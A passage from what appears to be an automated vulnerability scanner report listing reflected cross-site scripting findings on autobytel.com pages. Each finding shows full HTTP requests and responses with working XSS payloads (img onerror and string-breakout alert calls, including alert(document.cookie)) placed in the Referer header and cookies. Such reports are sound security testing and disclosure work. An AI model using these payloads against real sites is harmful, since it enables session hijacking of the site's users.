Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ask-our-mechanics/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=303f1--><img%20src%3da%20onerror%3dalert(1)>22eba66e9cd

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:02 GMT
Content-Length: 22293
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E303f1%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E22eba66e9cd;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 303f1--><img src=a onerror=alert(1)>22eba66e9cd -->
...[SNIP]...

4.1894. http://www.autobytel.com/ask-our-mechanics/my-garage.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /ask-our-mechanics/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d81f"%3balert(1)//3dfa9812b5a was submitted in the Referer HTTP header. This input was echoed as 7d81f";alert(1)//3dfa9812b5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ask-our-mechanics/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=7d81f"%3balert(1)//3dfa9812b5a

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:52:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:52 GMT
Content-Length: 22255
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:52 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E7d81f%22%3Balert%281%29%2F%2F3dfa9812b5a;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~7d81f";alert(1)//3dfa9812b5a";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "486F944D-9E1F-99F6-CC3A9C83
...[SNIP]...

4.1895. http://www.autobytel.com/auto-insurance-quotes.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /auto-insurance-quotes.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload fc74a--><img%20src%3da%20onerror%3dalert(1)>d60633d14d1 was submitted in the Referer HTTP header. This input was echoed as fc74a--><img src=a onerror=alert(1)>d60633d14d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /auto-insurance-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=fc74a--><img%20src%3da%20onerror%3dalert(1)>d60633d14d1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:57:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:33 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:33 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Efc74a%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ed60633d14d1;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33775


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: fc74a--><img src=a onerror=alert(1)>d60633d14d1 -->
...[SNIP]...

4.1896. http://www.autobytel.com/auto-insurance-quotes.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /auto-insurance-quotes.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e29b9"%3balert(1)//723a49350c8 was submitted in the Referer HTTP header. This input was echoed as e29b9";alert(1)//723a49350c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /auto-insurance-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=e29b9"%3balert(1)//723a49350c8

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 33737
Expires: Mon, 24 Jan 2011 23:57:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:18 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:17 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:17 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ee29b9%22%3Balert%281%29%2F%2F723a49350c8;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~e29b9";alert(1)//723a49350c8";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48981BAA-0570-157C-F6520A26
...[SNIP]...

4.1897. http://www.autobytel.com/car-advice.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-advice.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58fb1"%3balert(1)//f762c262f48 was submitted in the Referer HTTP header. This input was echoed as 58fb1";alert(1)//f762c262f48 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-advice.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=58fb1"%3balert(1)//f762c262f48

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 43851
Expires: Mon, 24 Jan 2011 23:57:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:02 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:02 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E58fb1%22%3Balert%281%29%2F%2Ff762c262f48;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~58fb1";alert(1)//f762c262f48";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4895AC58-A8F6-90D6-8B8F168B
...[SNIP]...

4.1898. http://www.autobytel.com/car-advice.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-advice.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload c62ef--><img%20src%3da%20onerror%3dalert(1)>8fc335ce01b was submitted in the Referer HTTP header. This input was echoed as c62ef--><img src=a onerror=alert(1)>8fc335ce01b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /car-advice.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=c62ef--><img%20src%3da%20onerror%3dalert(1)>8fc335ce01b

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:59:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:59:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:59:39 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:59:39 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ec62ef%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E8fc335ce01b;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 43889


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: c62ef--><img src=a onerror=alert(1)>8fc335ce01b -->
...[SNIP]...

4.1899. http://www.autobytel.com/car-blog.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-blog.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 174c5--><img%20src%3da%20onerror%3dalert(1)>1dccc386485 was submitted in the Referer HTTP header. This input was echoed as 174c5--><img src=a onerror=alert(1)>1dccc386485 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /car-blog.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=174c5--><img%20src%3da%20onerror%3dalert(1)>1dccc386485

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:00:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:00:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:00:35 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:00:35 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E174c5%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E1dccc386485;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62176


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 174c5--><img src=a onerror=alert(1)>1dccc386485 -->
...[SNIP]...

4.1900. http://www.autobytel.com/car-blog.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-blog.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc9a7"%3balert(1)//2128de599ac was submitted in the Referer HTTP header. This input was echoed as cc9a7";alert(1)//2128de599ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-blog.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=cc9a7"%3balert(1)//2128de599ac

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:00:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:00:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:00:21 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:00:21 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ecc9a7%22%3Balert%281%29%2F%2F2128de599ac;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62138


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~cc9a7";alert(1)//2128de599ac";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48B3F66F-07B4-1292-99ED2518
...[SNIP]...

4.1901. http://www.autobytel.com/car-dealers.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-dealers.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b925"%3balert(1)//7f41c8730bc was submitted in the Referer HTTP header. This input was echoed as 5b925";alert(1)//7f41c8730bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-dealers.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=5b925"%3balert(1)//7f41c8730bc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:04:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:04:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:04:40 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
